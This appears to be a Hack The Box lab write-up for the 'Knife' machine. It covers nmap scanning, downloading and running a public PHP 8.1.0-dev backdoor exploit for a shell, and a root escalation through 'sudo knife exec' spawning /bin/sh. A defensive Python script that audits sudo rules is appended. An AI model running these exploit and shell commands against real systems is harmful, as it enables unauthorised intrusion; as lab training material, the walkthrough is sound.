Pwning Knife from HTB in less than 20 minutes

knife from HTB

Set up your VPN & let’s dive in ;)

Now let’s run a quick nmap scan against the target machine.

I prefer to run two different scans simultaneously, which are:

nmap -sC -sV -T4 -p- <IP>

nmap -vv --script vuln -p- <IP>

I won’t go deep into the explanation, but the first command performs the enumeration, i.e. it tells us which services are running on the target and which ports are open, while the second one scans for exploitable vulnerabilities from CVEs and famous or old exploits like MS17-010 (EternalBlue), etc.

So after running these commands I got two outputs. From the first command we have:

and from second command we have:

As the nmap output clearly shows, there is a publicly available web page, so let’s go to it. After loading it we don’t get much useful info, but we do get the technologies it runs on along with their version information. For this you can either use the Wappalyzer browser plugin (recommended) or Inspect Element in the browser.

We find the PHP version to be 8.1.0-dev.

Now the most important question is: how do we approach the target when there is practically no obvious way of getting in?

Fortunately there is an exploit script that exploits this version of PHP and brings a shell back to us through netcat.

Now we download that script from this link.

If you are working on Kali or any other Linux, run this command to download it and name it exploit.py, or whatever you like!!

wget https://packetstormsecurity.com/files/download/162749/php_8.1.0-dev.py.txt -O exploit.py

Now we deploy this exploit on target to get the shell by this command.

python3 exploit.py -u http://10.10.10.242/ -c "id"

I used "id" with -c because the exploit requires a command as a parameter; run it with the help option to see the details.

We will get a shell that looks something like:

Now we search through the available folders to find the user flag. (It is easy, believe me.)

What remains now is privilege escalation.

We have two methods to do this.

The first method is to escalate privileges through the source files, which are written in Ruby. So either we write an exploit around this or just pass some commands to exploit it (like a hacker XD).

The other method is to escalate privileges through these steps:

sudo -l

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

Now hop from folder to folder and get the root flag.
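The escalation above works only because a sudo rule lets the user run knife as root, and `knife exec` evaluates arbitrary Ruby. As an added defensive check that is not part of the original walkthrough, the following Python script audits `sudo -l` output for rules that hand out such code-executing binaries as root; the sample output is constructed for illustration, not captured from the box.

```python
import re
from pathlib import PurePosixPath

# Constructed sample of `sudo -l` output (assumption: illustrative, not a real capture).
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/apt-get
    (ALL) NOPASSWD: /usr/bin/systemctl status nginx
"""

# Binaries that execute caller-controlled code, so a root sudo rule on them is
# equivalent to a root shell. knife is listed because `knife exec` runs Ruby.
CODE_EXEC_BINARIES = {
    "knife", "ruby", "python", "python3", "perl", "bash", "sh",
    "vim", "vi", "less", "find", "env",
}

# One rule line: "(runas) [TAG: ...] /path/cmd [args][, /path/cmd2 ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return the rules in `sudo -l` output that amount to root code execution."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()  # "(root : root)" -> root
        if runas_user not in ("root", "ALL"):
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(", "):
            parts = cmd.strip().split()
            binary = PurePosixPath(parts[0]).name
            if parts[0] != "ALL" and binary not in CODE_EXEC_BINARIES:
                continue
            findings.append({
                "binary": binary,
                "command": cmd.strip(),
                "nopasswd": nopasswd,
                # No fixed arguments means sudo accepts any arguments, e.g. `knife exec`.
                "unrestricted_args": len(parts) == 1,
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"ROOT CODE EXEC via sudo: {f['command']} (NOPASSWD={f['nopasswd']})")
```

Feed it real output with `sudo -l | python3 audit_sudo.py` after replacing the sample, and treat any unrestricted-argument hit as a rule to remove or pin to exact arguments.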

Don’t forget to give a clap and follow for more easy-peasy walkthroughs. Thanks for reading ❤